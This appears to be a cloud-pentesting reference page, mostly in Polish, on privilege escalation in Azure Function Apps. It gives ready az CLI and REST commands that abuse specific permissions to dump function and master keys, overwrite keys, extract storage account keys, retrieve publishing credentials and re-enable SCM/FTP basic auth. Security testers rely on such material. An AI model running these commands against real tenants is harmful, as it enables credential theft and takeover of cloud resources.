Az - Functions App Privesc

Function Apps

Sprawdź następującą stronę, aby uzyskać więcej informacji:

Microsoft.Web/sites/host/listkeys/action

To uprawnienie pozwala na wylistowanie kluczy funkcji, klucza głównego i kluczy systemowych, ale nie klucza hosta, określonej funkcji za pomocą:

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

To uprawnienie pozwala na uzyskanie klucza hosta dla określonej funkcji za pomocą:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

To uprawnienie pozwala na tworzenie/aktualizowanie klucza funkcji dla określonej funkcji z:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

To uprawnienie pozwala na utworzenie/aktualizację klucza głównego dla określonej funkcji z:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

To uprawnienie pozwala na tworzenie/aktualizowanie klucza funkcji systemowej dla określonej funkcji z:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

To uprawnienie pozwala na uzyskanie zmiennych środowiskowych funkcji. W tych zmiennych może być możliwe znalezienie domyślnych zmiennych środowiskowych AzureWebJobsStorage lub WEBSITE_CONTENTAZUREFILECONNECTIONSTRING, które zawierają klucz konta do uzyskania dostępu do magazynu blobów funkcji z PEŁNYMI uprawnieniami.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Te uprawnienia pozwalają na wylistowanie wszystkich profili publikacji, które zasadniczo zawierają podstawowe dane uwierzytelniające:

# Gte creds
az functionapp deployment list-publishing-profiles \
--name basicauthenabled \
--resource-group Resource_Group_1 \
--output json

• Metoda SCM

Następnie możesz uzyskać dostęp za pomocą tych podstawowych danych uwierzytelniających do URL SCM twojej aplikacji funkcji i uzyskać wartości zmiennych środowiskowych:

# Get env variables values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

Note that the SCM username is usually the char "$" followed by the name of the app, so: $<app-name>.

A te zmienne środowiskowe zawierają AccountKey konta magazynowego przechowującego dane aplikacji funkcji, co pozwala na kontrolowanie tego konta magazynowego.

If you see that those credentials are REDACTED, it's because you need to enable the SCM basic authentication option and for that you need the second permission (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'